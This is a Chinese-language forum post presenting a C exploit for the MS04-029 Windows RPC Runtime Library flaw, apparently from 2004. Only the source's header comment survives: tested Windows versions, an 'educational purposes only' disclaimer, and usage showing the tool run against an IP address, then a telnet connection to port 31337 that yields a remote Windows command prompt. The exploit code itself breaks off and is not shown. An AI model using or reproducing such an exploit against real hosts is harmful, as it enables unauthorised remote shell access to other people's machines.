发新话题
打印

Exploit for Vulnerability in RPC Runtime Library

Exploit for Vulnerability in RPC Runtime Library

文章作者:maxload@yahoo.com

[code]/*
*  Date: 2004/10/30
*  Maxload maxload@yahoo.com
*
*  Exploit for "Vulnerability in RPC Runtime Library"
*  http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
*  Tested Against:
*  Windows 2000 (SP3 SP4)
*  Windows XP (SP1 SP2)
*  Windows NT4 (SP6a)
*
*  EXPLOIT IS PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT
*  I TAKE NO RESPONSIBILITY FOR ANY USE OF THIS CODE.
*
*
*  Instructions:
*
*  [user@localhost] $ gcc -o maxload maxload.c
*  [user@localhost] $ ./maxload
*  *** MaxLoad (windows rpc exploit) v.1 ***
*
*  For educational propose only!
*  error: you must enter a valid ip
*  usage:./maxload [IP-ADDRESS]
*  e.g: ./maxload 192.168.1.23
*
*
*  [user@localhost] $ ./maxload 192.168.1.2
*  *** MaxLoad (windows rpc exploit) v.1 ***
*  For educational propose only!
*  Succes! Try connect to 192.168.1.2 port 31337
*
*
*  [user@localhost] $ telnet 192.168.1.2 31337
*  Connected to 192.168.1.2.
*  Escape character is '^]'.
*
*  Microsoft Windows XP [Version 5.1.2600]
*  

TOP

发新话题